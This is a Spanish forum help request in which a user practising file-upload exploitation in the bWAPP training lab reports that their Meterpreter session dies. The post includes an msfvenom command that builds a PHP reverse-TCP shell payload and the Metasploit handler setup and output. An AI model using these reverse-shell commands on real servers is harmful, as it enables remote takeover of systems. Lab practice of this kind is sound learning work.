Problemas con Meterpreter session closed. Reason: Died

Iniciado por $B3L3r0F0nt3$, Febrero 23, 2018, 01:43:34 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Febrero 23, 2018, 01:43:34 AM Ultima modificación: Febrero 23, 2018, 01:48:26 AM por $B3L3r0F0nt3$
Estimados Underc0ders;

Tengo varios días intentando resolver el problema de File Upload Exploitation in bWAPP (Bypass All Security), Y cada vez que lanzo mi exploit utilizando "exploit /multi/handler", no e podido iniciar el meterpreter> en la maquina de la victima o localhost, estoy Utilizando para PoC Kal Linux 2017.3 la herramienta de "bWAPP", también e intentando realizarlo desde Windows10 utilizando PentestBox-with-Metasploit-v2.2 y bWAPP dentro del Windows10 y no e tenido éxito, a continuación les muestro el proceso que realiza.

Creación de la Carga Útil con MSFVenom:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<My_IP> LPORT=4444 -f raw > shell.php

Uso de módulos auxiliares metasploit:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.150
LHOST => 192.168.1.150
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit

  • Started reverse TCP handler on 192.168.1.150:4444
  • Sending stage (37543 bytes) to 192.168.1.150
  • 192.168.1.150 - Meterpreter session 1 closed.  Reason: Died
    ----------------------------------------------------------------------
    Les agradecería su apoyo con este tema.

    Gracias.